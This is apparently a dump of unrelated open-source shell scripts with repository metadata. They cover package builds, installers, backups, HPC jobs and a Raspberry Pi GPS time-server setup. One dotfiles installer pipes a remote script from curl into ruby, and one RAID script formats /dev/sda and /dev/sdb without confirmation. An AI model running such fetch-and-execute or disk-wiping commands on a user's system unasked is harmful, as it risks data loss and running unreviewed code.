file=$(sed -e "s/combined/metadata/g" <<< $file)
echo "${file}_${train}"
mv "${file}_${train}" "data/MetaData_mallet_train"
mv "${file}__${test}" "data/MetaData_mallet_test"
mv "${file}__" "data/MetaData_mallet_dev"
rm "${file}_"
| true
|
fc02bdad97335b7d0a20b2b88766eed713eeff77
|
Shell
|
tarmiste/lfspkg
|
/archcore/svnsnap/community/colorgcc/repos/community-any/PKGBUILD
|
UTF-8
| 880
| 2.609375
| 3
|
[] |
no_license
|
# $Id: PKGBUILD 164529 2016-03-03 17:18:57Z jlichtblau $
# Maintainer: Eric Belanger <eric@archlinux.org>
# Maintainer: Jaroslav Lichtblau <svetlemodry@archlinux.org>
pkgname=colorgcc
pkgver=1.4.4
pkgrel=2
pkgdesc="A Perl wrapper to colorize the output of compilers with warning/error messages matching the gcc output format"
arch=('any')
url="http://www.schlueters.de/colorgcc.html"
license=('GPL')
depends=('perl')
makedepends=('git')
backup=('etc/colorgcc/colorgccrc')
source=(git://github.com/olibre/colorgcc.git#tag=$pkgver)
sha1sums=('SKIP')
package() {
cd ${pkgname}
install -D -m755 colorgcc.pl "${pkgdir}/usr/bin/colorgcc"
install -D -m644 colorgccrc "${pkgdir}/etc/colorgcc/colorgccrc"
install -D -m644 README.md "${pkgdir}/usr/share/doc/colorgcc/README"
install -d "${pkgdir}/usr/lib/colorgcc/bin"
for i in cc c++ gcc g++ ; do
ln -s /usr/bin/colorgcc "${pkgdir}/usr/lib/colorgcc/bin/${i}"
done
}
| true
|
72bc289614ece0a5327dd4dcd762e14c2b8b9677
|
Shell
|
sasipalakizhi/keytool-certificate-chain-example
|
/src/07_importcert_intermediate.sh
|
UTF-8
| 399
| 2.9375
| 3
|
[] |
no_license
|
#! /usr/bin/env bash
set -o nounset
set -o errexit
# Importing the Root CA's certificate into the Intermediate CA's key store.
"$JAVA_HOME/bin/keytool" -importcert \
-alias "$ROOT_ALIAS" \
-file "$ROOT_CERTIFICATE" \
-keypass "$INTERMEDIATE_KEYPASS" \
-keystore "$INTERMEDIATE_KEYSTORE" \
-noprompt \
-rfc \
-storepass "$INTERMEDIATE_STOREPASS" \
-storetype "$INTERMEDIATE_STORETYPE" \
-v
| true
|
44394e6f7c662130f2b632adc4b3d70570d841a8
|
Shell
|
paw3142/overc-installer
|
/installers/simple-install-md0.sh
|
UTF-8
| 486
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
BASEDIR=$(dirname $BASH_SOURCE)
if [ ! -f fdisk-a.txt ]; then
echo "ERROR. no fdisk setup files available"
exit 1
fi
# fdisk. create partition layouts
fdisk /dev/sda < ./fdisk-a.txt
fdisk /dev/sdb < ./fdisk-b.txt
# md
mdadm --create /dev/md0 -n2 -l0 /dev/sda3 /dev/sdb2
mkfs.ext4 -v -E stride=128 /dev/md0
mkdir /z
mount -v /dev/md0 /z
mkfs.ext4 /dev/sda1
mkswap /dev/sda2
mkswap /dev/sdb1
# Mount the boot partition:
cd /z
mkdir boot
mount -v /dev/sda1 boot
| true
|
31a21435b70d3fedc5588b886afc6cb0920b4a4b
|
Shell
|
copasi/COPASI
|
/admin/yacc.sh
|
UTF-8
| 2,062
| 3.15625
| 3
|
[
"LicenseRef-scancode-proprietary-license",
"Artistic-2.0",
"LicenseRef-scancode-other-copyleft"
] |
permissive
|
#!/usr/bin/env bash
# Copyright (C) 2019 - 2021 by Pedro Mendes, Rector and Visitors of the
# University of Virginia, University of Heidelberg, and University
# of Connecticut School of Medicine.
# All rights reserved.
# Copyright (C) 2017 - 2018 by Pedro Mendes, Virginia Tech Intellectual
# Properties, Inc., University of Heidelberg, and University of
# of Connecticut School of Medicine.
# All rights reserved.
# Copyright (C) 2010 - 2016 by Pedro Mendes, Virginia Tech Intellectual
# Properties, Inc., University of Heidelberg, and The University
# of Manchester.
# All rights reserved.
# Copyright (C) 2008 - 2009 by Pedro Mendes, Virginia Tech Intellectual
# Properties, Inc., EML Research, gGmbH, University of Heidelberg,
# and The University of Manchester.
# All rights reserved.
# Copyright (C) 2005 - 2007 by Pedro Mendes, Virginia Tech Intellectual
# Properties, Inc. and EML Research, gGmbH.
# All rights reserved.
YACC="$1"
PATH=$PATH:/bin:/usr/bin:/usr/local/bin
for arg in $@; do
SOURCE_FILE=$arg
done
cd "$(dirname "${SOURCE_FILE}")"
SOURCE_FILE="$(basename "${SOURCE_FILE}")"
FILE_PREFIX="${SOURCE_FILE/%.*/}"
TARGET_FILE_C=${SOURCE_FILE/%.*/_yacc.cpp}
TARGET_FILE_H=${SOURCE_FILE/%.*/_yacc.hpp}
echo compiling $SOURCE_FILE '==>' $TARGET_FILE_C, $TARGET_FILE_H
echo ${YACC} -dt -b $FILE_PREFIX -p $FILE_PREFIX $SOURCE_FILE
${YACC} -dt -b $FILE_PREFIX -p $FILE_PREFIX $SOURCE_FILE
# We make sure that the file have the expected endings.
[ -e $FILE_PREFIX.tab.cpp ] && mv $FILE_PREFIX.tab.cpp ${TARGET_FILE_C}
[ -e $FILE_PREFIX.tab.hpp ] && mv $FILE_PREFIX.tab.hpp ${TARGET_FILE_H}
sed -e 's/'$FILE_PREFIX'parse/yyparse/g' \
-e '/#define yylex/d' \
-e '/int yyparse (.*);/d' \
-e 's/'$FILE_PREFIX'.tab.cpp/'$TARGET_FILE_C'/g' \
-e 's/'$FILE_PREFIX'.tab.hpp/'$TARGET_FILE_H'/g' \
-e 's/int yydebug;/int yydebug = YYDEBUG;/' \
-e '/getenv()/d' \
${TARGET_FILE_C} > $$.tmp && \
mv $$.tmp ${TARGET_FILE_C}
if [ x`uname -a | grep -ic cygwin` = x"1" ]; then
unix2dos ${TARGET_FILE_C}
unix2dos ${TARGET_FILE_H}
fi
| true
|
c94e6e7bdbb81c53ecf69599650cad665829d994
|
Shell
|
zack6849/dotfiles
|
/Code/Scripts/take-screenshot
|
UTF-8
| 174
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
RANDFILENAME=$(pwgen -s 13 1)
FILENAME="$HOME/Uploader/Screenshots/$RANDFILENAME.png"
scrot -s $FILENAME -e "screenshot-complete.sh $RANDFILENAME.png $FILENAME"
| true
|
123435a8b4bf16a9afa801f91f765049ea23ef04
|
Shell
|
robbiekenny/EAA
|
/week4B
|
UTF-8
| 226
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
if [ $1 == true ]; then
if ! [ -d $HOME/EAA/backups ]; then
mkdir $HOME/EAA/backups
fi
tar czf week4backup.tar.gz $HOME/EAA/week4
mv week4backup.tar.gz $HOME/EAA/backups
else
tar -xzvf week4backup.tar.gz
fi
| true
|
05d73da8f622a43e14d655252e5d2c1052724431
|
Shell
|
lihongjie224/dst-admin
|
/src/main/resources/shell/other.sh
|
UTF-8
| 4,178
| 3.6875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
project="dst-admin" # 项目名称
sys=$(uname -s) # 操作系统
machine=$(uname -m) # 架构版本
darwin_steamcmd_link="https://steamcdn-a.akamaihd.net/client/installer/steamcmd_osx.tar.gz"
linux_steamcmd_link="https://steamcdn-a.akamaihd.net/client/installer/steamcmd_linux.tar.gz"
# 创建Linux服务器环境
create() {
echo "正在安装steamcmd..."
res=`./steamcmd.sh +login anonymous +force_install_dir ~/dst +app_update 343050 validate +quit`
res=$res | grep "0x202"
if [ -z "$res" ]; then
echo "${project} - 0x202错误 请检查可用空间是否 > 24GB"
echo "${project} - 删除可能的 ~/steamcmd ~/Steam ~/dst 目录后重试 ./install.sh"
rm -rf ~/Steam
rm -rf ~/dst
rm -rf ~/steamcmd
exit 1;
fi
cp ~/steamcmd/linux32/libstdc++.so.6 ~/dst/bin/lib32/
cd ~/dst/bin
echo ./dontstarve_dedicated_server_nullrenderer -console -cluster MyDediServer -shard Master > overworld.sh
echo ./dontstarve_dedicated_server_nullrenderer -console -cluster MyDediServer -shard Caves > cave.sh
chmod +x overworld.sh
chmod +x cave.sh
mkdir -p ~/.klei/DoNotStarveTogether/MyDediServer
cd ~
echo -e "${project} - 初始化完成\n${project} - 执行dstStart.sh脚本按照指示进行\n${project} - ./dstStart.sh"
exit 1
}
# 配置环境
main() {
# mac
if [ "$sys" == "Darwin" ]; then
echo "${project} - 操作系统:MacOS"
mkdir ~/steamcmd && cd ~/steamcmd
wget ${darwin_steamcmd_link}
tar -zxvf steamcmd_osx.tar.gz
./steamcmd.sh +login anonymous +force_install_dir ~/dst +app_update 343050 validate +quit
cd ~/dst
mkdir ~/dst/bin
echo ~/dst/dontstarve_dedicated_server_nullrenderer.app/Contents/MacOS/dontstarve_dedicated_server_nullrenderer -console -cluster MyDediServer -shard Master > ~/dst/bin/overworld.sh
echo ~/dst/dontstarve_dedicated_server_nullrenderer.app/Contents/MacOS/dontstarve_dedicated_server_nullrenderer -console -cluster MyDediServer -shard Caves > ~/dst/bin/cave.sh
chmod +x ~/dst/bin/overworld.sh
chmod +x ~/dst/bin/cave.sh
mkdir -p ~/.klei/DoNotStarveTogether/MyDediServer
cd ~
echo -e "${project} - 初始化完成\n${project} - 执行dstStart.sh脚本按照指示进行\n${project} - ./dstStart.sh"
exit 1
fi
# linux
if [ "$sys" == "Linux" ]; then
distribution=$(lsb_release -i | awk '{print $3}') # 发行版本
echo "${project} - 操作系统:Linux"
echo "${project} - ${distribution} ${machine}"
if [ "$machine" == "x86_64" ]; then
case $distribution in
CentOS)
echo "${project} - 安装CentOS依赖环境"
mkdir ~/steamcmd && cd ~/steamcmd
wget ${linux_steamcmd_link}
tar -xvzf steamcmd_linux.tar.gz
sudo yum install -y glibc.i686 libstdc++.i686 ncurses-libs.i686 screen libcurl.i686
sudo yum install -y SDL2.x86_64 SDL2_gfx-devel.x86_64 SDL2_image-devel.x86_64 SDL2_ttf-devel.x86_64
# CentOS需要建立libcurl-gnutls.so.4软连接
ln -s /usr/lib/libcurl.so.4 /usr/lib/libcurl-gnutls.so.4
create
;;
Ubuntu)
echo "${project} - 安装Ubuntu依赖环境"
mkdir ~/steamcmd && cd ~/steamcmd
wget ${linux_steamcmd_link}
tar -xvzf steamcmd_linux.tar.gz
sudo apt-get update
sudo apt-get install -y lib32gcc1 libcurl4-gnutls-dev:i386 libsdl2-2.0 libsdl2-dev screen
sudo apt-get install -y libsdl-image1.2-dev libsdl-mixer1.2-dev libsdl-ttf2.0-dev libsdl-gfx1.2-dev
create
;;
*)
echo "${project} - 暂不支持该Linux发行版 ${distribution}"
;;
esac
else
echo "${project} - 不受支持的架构版本 ${machine}"
fi
fi
}
main
| true
|
bc43e88e357dc64194bcf9b044ba9d80c69ce38b
|
Shell
|
iToto/dotfiles
|
/install.sh
|
UTF-8
| 4,485
| 4.21875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Settings
cwd=$(pwd)
# functions for text formatting
info () {
printf " [ \033[00;34m..\033[0m ] $1"
}
user () {
printf "\r [ \033[0;33m?\033[0m ] $1 "
}
success () {
printf "\r\033[2K [ \033[00;32mOK\033[0m ] $1\n"
}
fail () {
printf "\r\033[2K [\033[0;31mFAIL\033[0m] $1\n"
echo ''
exit
}
prompt_warning () {
# warn user about overwriting files
info "WARNING: This script will replace all current dotfile settings. \n"
info "Would you like to continue? [Y/n]: "
read cont
printf "\n"
if [ "$cont" = "n" ]; then
echo "Exited."
exit
fi
}
# Install methods
pkgmgmt=true
packagemanager_setup () {
while $pkgmgmt; do
# check which os we're running
info "Operating System [ a:arch, d:debian, r:redhat, o:osx ]: "
read os
printf "\n"
# pick which package manager to use based on os
case "$os" in
"a")
pkgmgmt="pacman -S"
;;
"d")
pkgmgmt="apt-get install"
;;
"r")
pkgmgmt="yum install"
;;
"o")
pkgmgmt="brew install"
;;
*)
echo "Please select a valid Operating System."
;;
esac
done
# prepend sudo if not osx
[ $os != "o" ] && pkgmgmt="sudo $pkgmgmt"
# If osx, check if Homebrew is installed
if [ "$os" = "o" ]; then
which -s brew
if [[ $? != 0 ]] ; then
# Install Homebrew
info "Installing Homebrew"
ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
fi
fi
}
programs_install () {
info 'Installing Programs \n'
# Update packages
info "Updating Packages"
$pkgmgmt update
# if osx, install things a little differently
if [ "$os" = "o" ]; then
source $cwd/osx/install.sh
else
$pkgmgmt python-pip vim vim-nox
fi
# install tmux and curl
$pkgmgmt tmux curl
}
packages_install () {
# install python packages
sudo pip install virtualenv
sudo pip install virtualenvwrapper
sudo pip install httpie
}
# gitconfig
git_install () {
info 'setup gitconfig'
user ' - What is your github author name?'
read -e git_authorname
user ' - What is your github author email?'
read -e git_authoremail
sed -e "s/AUTHORNAME/$git_authorname/g" -e "s/AUTHOREMAIL/$git_authoremail/g" $cwd/git/gitconfig > $HOME/.gitconfig
success 'gitconfig'
}
git_update () {
info 'setup git'
cp $cwd/git/gitignore $HOME/.gitignore
cp $cwd/git/gitconfig $HOME/.gitconfig
success 'setup git'
}
# generic shell
shell_update () {
info 'installing shell aliases, functions, and paths'
cp $cwd/shell/aliases.sh $HOME/.aliases
cp $cwd/shell/functions.sh $HOME/.functions
cp $cwd/shell/paths.sh $HOME/.paths
success 'installed shell aliases, functions, and paths'
}
# zsh
shell_zsh_install () {
# Install Zsh
info "Installing Zsh \n"
$pkgmgmt zsh
info "Setting zsh as default shell \n"
chsh -s /bin/zsh
}
shell_zsh_update () {
info 'setting up zsh'
cp $cwd/shell/zsh/zshrc $HOME/.zshrc
cp -r $cwd/shell/zsh $HOME/.zsh
success 'set up zsh'
}
# bash
shell_bash_update () {
info 'setting up bash'
cp $cwd/shell/bash/bashrc ~/.bashrc
cp -r $cwd/shell/bash ~/.bash
success 'set up bash'
}
# tmux
tmux_update () {
info 'Installing tmux settings.'
cp $cwd/tmux/tmux.conf ~/.tmux.conf
success 'Installing tmux settings.'
}
# vim
vim_update () {
if [ ! -d "$HOME/.vim" ]; then
cp -r $cwd/vim $HOME/.vim
fi
cp $cwd/vim/vimrc $HOME/.vimrc
cp $cwd/vim/bundles.vim $HOME/.vim/bundles.vim
if [ -d "$HOME/.vim/plugin-configs" ]; then
rm -rf $HOME/.vim/plugin-configs
fi
cp -r $cwd/vim/plugin-configs $HOME/.vim
if [ ! -d "$HOME/.vim/bundle/vundle" ]; then
git clone https://github.com/gmarik/vundle.git $HOME/.vim/bundle/vundle
fi
vim +BundleInstall +qall
}
vim_install () {
info 'setup vim'
cp -r $cwd/vim ~/.vim
vim_update
success 'vim setup'
}
# misc
misc_update () {
cp $cwd/ag/agignore ~/.agignore
}
misc_install() {
misc_update
}
# do it!
if [ "$1" = "update" ]; then
git_update
shell_update
shell_zsh_update
vim_update
tmux_update
misc_update
# todo: add update methods everything else
else
# let's do this!
prompt_warning
packagemanager_setup
programs_install
packages_install
git_install
git_update
shell_update
shell_zsh_install
shell_zsh_update
shell_bash_install
tmux_update
vim_install
misc_install
fi
success "All done!"
| true
|
a63ca8988401b35c68ed3bf453e89161d8e1968f
|
Shell
|
cha63506/zyre-git
|
/PKGBUILD
|
UTF-8
| 1,127
| 3.0625
| 3
|
[] |
no_license
|
# Contributor: Patrick Hanckmann <hanckmann at gmail.com>
# Maintainer: Patrick Hanckmann <hanckmann at gmail.com>
pkgname=zyre-git
pkgver=1.0.0
pkgrel=2
pkgdesc="Zyre - an open-source framework for proximity-based peer-to-peer applications (ZeroMQ)"
arch=(i686 x86_64)
url="https://github.com/zeromq/zyre"
license=('LGPL')
depends=('czmq-git')
makedepends=('git')
provides=(zyre)
conflicts=(zyre)
options=(!libtool)
_gitroot="git://github.com/zeromq/zyre.git"
_gitname="zyre"
build() {
cd "$srcdir"
msg "Connecting to GIT server...."
rm -rf "$srcdir/$_gitname"
if [ -d $_gitname ] ; then
cd $_gitname && git pull origin
msg "The local files are updated."
else
git clone $_gitroot $_gitname
fi
# switch to tag v1.0.0
cd "$srcdir/$_gitname"
git checkout v1.0.0
msg "GIT checkout done or server timeout"
msg "Starting make..."
rm -rf "$srcdir/$_gitname-build"
git clone "$srcdir/$_gitname" "$srcdir/$_gitname-build"
cd "$srcdir/$_gitname-build"
#
# BUILD HERE
#
./autogen.sh
./configure --prefix=/usr
make
}
package() {
cd "$srcdir/$_gitname-build"
make DESTDIR="$pkgdir/" install
}
| true
|
fb6efe6f96eaa353c648f6ea1b1ad0108f2292a1
|
Shell
|
hsvarma2092/COMP2101
|
/bash/passwordguesser.sh
|
UTF-8
| 788
| 3.71875
| 4
|
[] |
no_license
|
#!/bin/bash
# This script demonstrates testing to see if 2 strings are the same
# TASK 1: Improve it by asking the user for a password guess instead of using inline literal data
# TASK 2: Improve it by rewriting it to use the if command
# TASK 3: Improve it by giving them 3 tries to get it right before failing (test 3 times but only if necessary)
# *** Do not use the exit command
read -s -p "enter password: " mypassword
referenceString="Scripting"
if [ $mypassword = $referenceString ];then
echo "Bingo !! you entered right password"
elif [ $mypassword = $referenceString ];then
echo "Bingo !! you entered right password"
elif [ $mypassword = $referenceString ];then
echo "Bingo !! you entered right password"
else
echo "fewww.. try again"
fi
| true
|
9de523f04bb2c7412fc5f60c5bca18cb4d066d65
|
Shell
|
wandrewjam/thesis
|
/reg_stokeslets/src/scripts/runner07.slurm
|
UTF-8
| 915
| 2.71875
| 3
|
[] |
no_license
|
#!/bin/bash
#SBATCH --time=16:00:00
#SBATCH --nodes=1
#SBATCH --ntasks=20
#SBATCH --account=fogelson
#SBATCH --partition=kingspeak
#SBATCH -C "c20"
#SBATCH -o runner07.out
#SBATCH -e runner07.err
# find number of threads for OpenMP (adapted from CHPC code)
# find number of MPI tasks per node
export TPN=$(echo $SLURM_TASKS_PER_NODE | cut -f 1 -d \()
# find number of CPU cores per node
export PPN=$(echo $SLURM_JOB_CPUS_PER_NODE | cut -f 1 -d \()
(( THREADS = PPN / TPN ))
# export OMP_NUM_THREADS=$THREADS
export OMP_NUM_THREADS=1
echo "$TPN"
echo "$PPN"
echo "$OMP_NUM_THREADS"
cd $HOME/thesis/reg_stokeslets/
module unload miniconda3/latest
module load miniconda3/latest
conda activate rolling
export start=$SECONDS
cat par-files/bd_runner07.txt | parallel --results output/outdir7 \
-j $TPN python src/3d/binding_expt.py
export duration=$(( SECONDS - start ))
echo "Completed in $duration seconds"
wait
| true
|
ba7ab0be2c447acffa9076c120db3bac3e47c901
|
Shell
|
probonopd/ungoogled-chromium
|
/packaging/linux_simple/package.sh.ungoogin
|
UTF-8
| 433
| 3.1875
| 3
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
set -eux
TARPREFIX=ungoogled-chromium_$ungoog{chromium_version}-$ungoog{release_revision}_linux
CURRENTDIR=$(dirname $(readlink -f $0))
# Assume source tree is outside this script's directory
ARCHIVE_OUTPUT="$CURRENTDIR/$TARPREFIX.tar.xz"
pushd "$CURRENTDIR"
python3 -m buildkit filescfg archive -c ../chrome/tools/build/linux/FILES.cfg --build-outputs ../out/Default -o "$ARCHIVE_OUTPUT" -i "$CURRENTDIR/README"
popd
| true
|
119adce4eac096643356f3a7d7dc5899a43adca3
|
Shell
|
ukhas/habcloud-salt-states
|
/ukhasnet/influxdb_backup.sh
|
UTF-8
| 391
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
set -eu
{% set admin_password = pillar['ukhasnet']['influxdb']['admin_password'] %}
{% set databases = pillar['ukhasnet']['influxdb']['databases'] %}
mkdir -p /tmp/influx-backups
chmod 700 /tmp/influx-backups
{% for database in databases %}
influxd backup -database {{ database }} /tmp/influx-backups
{% endfor %}
tar cf - -C / tmp/influx-backups
rm -rf /tmp/influx-backups
| true
|
e428534ce75b7b602db148f29d1888aa0ac724a4
|
Shell
|
hllowarc-ecu/scripts
|
/portfolio/week2/menu.sh
|
UTF-8
| 616
| 3.921875
| 4
|
[] |
no_license
|
#!/bin/bash
# run script passwordCheck.sh
./passwordCheck.sh
#check exit code of passwordCheck script if access is granted then
if [ $? = 0 ]; then
echo "1) Create a folder"
echo "2) Copy a folder"
echo "3) Set a password"
echo "4) Exit"
read n
case $n in
1)./foldermaker.sh;; #if 1 is selected then this script is run
2)./foldercopier.sh;; # if 2 is selected then this script is run
3)./setPassword.sh;; # if 3 is selected then this script is run
4)exit;;
*)echo -e "Please pick a number between 1 and 4"
esac
else
echo "Goodbye!" #if access is denied then this appears
fi
| true
|
d8cc18325b5c2cfb80823a614efb329afef34561
|
Shell
|
erikayahata/ESZB026-17-4-2018C
|
/leitura.sh
|
UTF-8
| 442
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/sh
ARQUIVODADOS=/home/pi/sist_embarcados_git/Amora/dados.txt
ARQUIVOSAIDA=/home/pi/sist_embarcados_git/Amora/dados.png
gnuplot << EOF
set title "Dados: "
set ylabel "Angulo (º)"
set xlabel "Tempo (s/4)"
set terminal png
set output "$ARQUIVOSAIDA"
plot "$ARQUIVODADOS" \
linecolor rgb '#0060ad' \
linetype 1 \
linewidth 1 \
pointtype 2 \
pointsize 1.0 \
title "Dados obtidos:" \
with linespoints
EOF
| true
|
167048a4dc05382d78ea36e8e8f03eb342e6e1c0
|
Shell
|
minggrim/.env
|
/util_scripts/dockerhere
|
UTF-8
| 575
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/bash
if [[ ! -z $1 ]]; then
if [[ ! -z $2 ]]; then
if [[ ! -z $3 ]]; then
docker run --name $2 --privileged=true -v $(pwd):/sources -w /sources --shm-size=1g -it $1 /bin/bash
else
docker run --name $2 --privileged=true -v $(pwd):/sources -w /sources --shm-size=1g -it --rm $1 /bin/bash
fi
else
docker run --privileged=true -v $(pwd):/sources -w /sources --shm-size=1g -it --rm $1 /bin/bash
fi
else
echo "Usage : dockerhere <image_name>"
echo "Available Docker Images : "
docker images
fi
| true
|
d201be09db9205b33c6d8c2144ce3a45b9274cb2
|
Shell
|
lisuke/repo
|
/archlinuxcn/julia-git-arrow-git/PKGBUILD
|
UTF-8
| 927
| 2.734375
| 3
|
[] |
no_license
|
pkgname=julia-git-arrow-git
pkgver=2.6.2.0.0.9.g95efe95
epoch=1
pkgrel=2
pkgdesc="Arrow.jl"
url="https://github.com/JuliaData/Arrow.jl"
arch=('any')
license=('MIT')
makedepends=(git julia-pkg-scripts)
depends=(julia-git)
provides=(julia-git-arrow "julia-git-arrowtypes-git=${pkgver}-${pkgrel}" julia-git-arrowtypes)
source=(git+https://github.com/JuliaData/Arrow.jl)
md5sums=('SKIP')
pkgver() {
cd Arrow.jl
git describe --tags | sed -e 's/^[^0-9]*//' -e 's/-/.0.0./' -e 's/-/./g'
}
package() {
cd Arrow.jl
. /usr/lib/julia/julia-install-pkg.sh Arrow "${pkgdir}" "${pkgname}" julia-git
ln -s Arrow/src/ArrowTypes "${pkgdir}/${site_dir}/ArrowTypes"
old_depends=("${depends[@]}")
_depends=() # use a different name to fool makepkg's stupic static check
for dep in "${old_depends[@]}"; do
if [[ "$dep" != julia-git-arrowtypes ]]; then
_depends+=("${dep}")
fi
done
depends=("${_depends[@]}")
}
| true
|
d21c69b04965f16f889e01828c06446b2ef0361e
|
Shell
|
sfahadshahzad/RPi-GPS-PPS-StratumOne
|
/install-gps-pps.sh
|
UTF-8
| 14,090
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
######################################################################
# 2018-11-13-raspbian-stretch-lite
##################################################################
# if a GPS module is already installed and is giving GPS feed on the GPIO-serial port,
# it can generate error messages to the console, because the kernel try to interprete this as commands from the boot console
sudo systemctl stop serial-getty@ttyAMA0.service;
sudo systemctl disable serial-getty@ttyAMA0.service;
sudo sed -i -e "s/console=serial0,115200//" /boot/cmdline.txt;
######################################################################
handle_locale() {
echo -e "\e[32mhandle_locale()\e[0m";
echo -e "\e[36m prepare locale to nothing (default:C.UTF-8)\e[0m";
export LC_TIME=C.UTF-8;
export LC_MONETARY=C.UTF-8;
export LC_ADDRESS=C.UTF-8;
export LC_TELEPHONE=C.UTF-8;
export LC_NAME=C.UTF-8;
export LC_MEASUREMENT=C.UTF-8;
export LC_IDENTIFICATION=C.UTF-8;
export LC_NUMERIC=C.UTF-8;
export LC_PAPER=C.UTF-8;
export LC_CTYPE=C.UTF-8;
export LC_MESSAGES=C.UTF-8;
export LC_ALL=C.UTF-8;
export LANG=C.UTF-8;
export LANGUAGE=C.UTF-8;
sudo sed -i -e "s/^en_GB.UTF-8 UTF-8/\# en_GB.UTF-8 UTF-8/" /etc/locale.gen;
sudo LC_ALL=C.UTF-8 locale-gen --purge;
sudo sh -c "cat << EOF > /etc/default/locale
# /etc/default/locale
LANG=C.UTF-8
LANGUAGE=C.UTF-8
LC_ALL=C.UTF-8
EOF";
}
######################################################################
handle_timezone() {
echo -e "\e[32mhandle_timezone()\e[0m";
echo -e "\e[36m prepare timezone to Etc/UTC\e[0m";
sudo sh -c "echo 'Etc/UTC' > /etc/timezone";
sudo dpkg-reconfigure -f noninteractive tzdata;
}
######################################################################
handle_update() {
echo -e "\e[32mhandle_update()\e[0m";
sudo sync \
&& echo -e "\e[32mupdate...\e[0m" && sudo apt update \
&& echo -e "\e[32mupgrade...\e[0m" && sudo apt full-upgrade -y \
&& echo -e "\e[32mautoremove...\e[0m" && sudo autoremove apt -y --purge \
&& echo -e "\e[32mautoclean...\e[0m" && sudo apt autoclean \
&& echo -e "\e[32mDone.\e[0m" \
&& sudo sync;
}
######################################################################
handle_gps() {
echo -e "\e[32mhandle_gps()\e[0m";
##################################################################
echo -e "\e[36m prepare GPS\e[0m";
##################################################################
# specific to 2017-08-16-raspbian-stretch-lite
echo -e "\e[36m make boot quiet to serial port: serial0\e[0m";
sudo sed -i -e "s/console=serial0,115200//" /boot/cmdline.txt;
sudo systemctl stop serial-getty@ttyAMA0.service;
sudo systemctl disable serial-getty@ttyAMA0.service;
##################################################################
echo -e "\e[36m install gpsd\e[0m";
sudo apt-get -y install gpsd gpsd-clients;
##################################################################
echo -e "\e[36m setup gpsd\e[0m";
sudo systemctl stop gpsd.socket;
sudo systemctl stop gpsd.service;
sudo sh -c "cat << EOF > /etc/default/gpsd
# /etc/default/gpsd
## Stratum1
START_DAEMON=\"true\"
GPSD_OPTIONS=\"-n\"
DEVICES=\"/dev/ttyAMA0 /dev/pps0\"
USBAUTO=\"false\"
GPSD_SOCKET=\"/var/run/gpsd.sock\"
EOF";
sudo systemctl restart gpsd.service;
sudo systemctl restart gpsd.socket;
##################################################################
grep -q Stratum1 /lib/systemd/system/gpsd.socket 2> /dev/null || {
echo -e "\e[36m fix gpsd to listen to all connection requests\e[0m";
sudo sed /lib/systemd/system/gpsd.socket -i -e "s/ListenStream=127.0.0.1:2947/ListenStream=0.0.0.0:2947/";
sudo sh -c "cat << EOF >> /lib/systemd/system/gpsd.socket
;; Stratum1
EOF";
}
grep -q Stratum1 /etc/rc.local 2> /dev/null || {
echo -e "\e[36m tweak GPS device at start up\e[0m";
sudo sed /etc/rc.local -i -e "s/^exit 0$//";
printf "## Stratum1
sudo systemctl stop gpsd.socket;
sudo systemctl stop gpsd.service;
# default GPS device settings at power on
stty -F /dev/ttyAMA0 9600
## custom GPS device settings
## 115200baud io rate,
#printf \x27\x24PMTK251,115200*1F\x5Cr\x5Cn\x27 \x3E /dev/ttyAMA0
#stty -F /dev/ttyAMA0 115200
## 10 Hz update interval
#printf \x27\x24PMTK220,100*2F\x5Cr\x5Cn\x27 \x3E /dev/ttyAMA0
sudo systemctl restart gpsd.service;
sudo systemctl restart gpsd.socket;
# workaround: lets start any gps client to forct gps service to wakeup and work
gpspipe -r -n 1 &
exit 0
" | sudo tee -a /etc/rc.local > /dev/null;
}
[ -f "/etc/dhcp/dhclient-exit-hooks.d/ntp" ] && {
sudo rm -f /etc/dhcp/dhclient-exit-hooks.d/ntp;
}
[ -f "/etc/udev/rules.d/99-gps.rules" ] || {
echo -e "\e[36m create rule to create symbolic link\e[0m";
sudo sh -c "cat << EOF > /etc/udev/rules.d/99-gps.rules
## Stratum1
KERNEL==\"pps0\",SYMLINK+=\"gpspps0\"
KERNEL==\"ttyAMA0\", SYMLINK+=\"gps0\"
EOF";
}
}
######################################################################
handle_pps() {
echo -e "\e[32mhandle_pps()\e[0m";
##################################################################
echo -e "\e[36m install PPS tools\e[0m";
sudo apt-get -y install pps-tools;
##################################################################
grep -q pps-gpio /boot/config.txt 2> /dev/null || {
echo -e "\e[36m setup config.txt for PPS\e[0m";
sudo sh -c "cat << EOF >> /boot/config.txt
# /boot/config.txt
max_usb_current=1
force_turbo=1
disable_overscan=1
hdmi_force_hotplug=1
config_hdmi_boost=4
#hdmi_ignore_cec_init=1
cec_osd_name=Stratum1
#########################################
# standard resolution
hdmi_drive=2
#########################################
# https://www.raspberrypi.org/documentation/configuration/config-txt.md
# https://github.com/raspberrypi/firmware/tree/master/boot/overlays
## Stratum1
# gps + pps + ntp settings
#Name: pps-gpio
#Info: Configures the pps-gpio (pulse-per-second time signal via GPIO).
#Load: dtoverlay=pps-gpio,<param>=<val>
#Params: gpiopin Input GPIO (default "18")
# assert_falling_edge When present, assert is indicated by a falling
# edge, rather than by a rising edge
# dtoverlay=pps-gpio,gpiopin=4,assert_falling_edge
dtoverlay=pps-gpio,gpiopin=4
#Name: pi3-disable-bt
#Info: Disable Pi3 Bluetooth and restore UART0/ttyAMA0 over GPIOs 14 & 15
# N.B. To disable the systemd service that initialises the modem so it
# doesn't use the UART, use 'sudo systemctl disable hciuart'.
#Load: dtoverlay=pi3-disable-bt
#Params: <None>
dtoverlay=pi3-disable-bt
EOF";
}
##################################################################
grep -q pps-gpio /etc/modules 2> /dev/null || {
echo -e "\e[36m add pps-gpio to modules for PPS\e[0m";
sudo sh -c "echo 'pps-gpio' >> /etc/modules";
}
}
######################################################################
######################################################################
disable_ntp() {
echo -e "\e[32mdisable_ntp()\e[0m";
